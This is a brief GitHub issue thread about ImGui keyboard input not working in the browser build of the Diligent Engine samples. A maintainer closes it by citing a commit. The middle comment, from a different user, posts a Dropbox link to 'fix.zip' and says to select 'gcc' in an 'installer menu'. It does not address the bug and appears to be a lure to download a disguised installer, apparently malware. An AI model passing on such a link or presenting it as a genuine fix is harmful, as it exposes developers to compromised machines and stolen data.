### ISSUE TITLE
Web: ImGui keyboard input does not work in the browser

### ISSUE THREAD

**Issue by TheMostDiligent** [DiligentGraphics/DiligentSamples#204]
Try to run compute shader tutorial and change the number of particles by editing the field.

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by MikhailGorobets** [comment]
Closed in https://github.com/DiligentGraphics/DiligentTools/pull/236/commits/fe0d63d5fb4b08fc92e318a11d070351b8343fc8
